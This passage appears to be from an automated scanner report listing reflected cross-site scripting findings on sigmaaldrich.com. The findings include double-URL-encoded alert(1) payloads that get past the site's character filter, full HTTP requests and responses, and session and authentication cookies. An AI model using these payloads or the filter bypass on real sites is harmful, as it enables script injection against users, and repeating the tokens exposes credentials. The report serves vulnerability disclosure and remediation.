Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:19 GMT
Content-Length: 28956
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/site-level87951";alert(1)//bbeb77e979e/career-opportunites","E404") ;
   </script>
...[SNIP]...

1.213. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/career-opportunites [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/career-opportunites

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26e21%2522%253balert%25281%2529%252f%252fc1e8dc9d45c was submitted in the REST URL parameter 4. This input was echoed as 26e21";alert(1)//c1e8dc9d45c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/site-level/career-opportunites26e21%2522%253balert%25281%2529%252f%252fc1e8dc9d45c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:21 GMT
Content-Length: 28956
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/site-level/career-opportunites26e21";alert(1)//c1e8dc9d45c","E404") ;
   </script>
...[SNIP]...

1.214. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/privacy-policy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/privacy-policy

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a356%2522%253balert%25281%2529%252f%252f72b398ea8f was submitted in the REST URL parameter 1. This input was echoed as 2a356";alert(1)//72b398ea8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content2a356%2522%253balert%25281%2529%252f%252f72b398ea8f/sigma-aldrich/site-level/privacy-policy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:15 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content2a356";alert(1)//72b398ea8f/sigma-aldrich/site-level/privacy-policy","E404") ;
   </script>
...[SNIP]...

1.215. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/privacy-policy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/privacy-policy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb9a%2522%253balert%25281%2529%252f%252f0680ae16661 was submitted in the REST URL parameter 2. This input was echoed as feb9a";alert(1)//0680ae16661 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichfeb9a%2522%253balert%25281%2529%252f%252f0680ae16661/site-level/privacy-policy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:16 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichfeb9a";alert(1)//0680ae16661/site-level/privacy-policy","E404") ;
   </script>
...[SNIP]...

1.216. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/privacy-policy [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/privacy-policy

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 921fc%2522%253balert%25281%2529%252f%252f87a750f4051 was submitted in the REST URL parameter 3. This input was echoed as 921fc";alert(1)//87a750f4051 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/site-level921fc%2522%253balert%25281%2529%252f%252f87a750f4051/privacy-policy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:18 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/site-level921fc";alert(1)//87a750f4051/privacy-policy","E404") ;
   </script>
...[SNIP]...

1.217. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/privacy-policy [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/privacy-policy

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2011%2522%253balert%25281%2529%252f%252f1d4c5be287d was submitted in the REST URL parameter 4. This input was echoed as b2011";alert(1)//1d4c5be287d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/site-level/privacy-policyb2011%2522%253balert%25281%2529%252f%252f1d4c5be287d HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
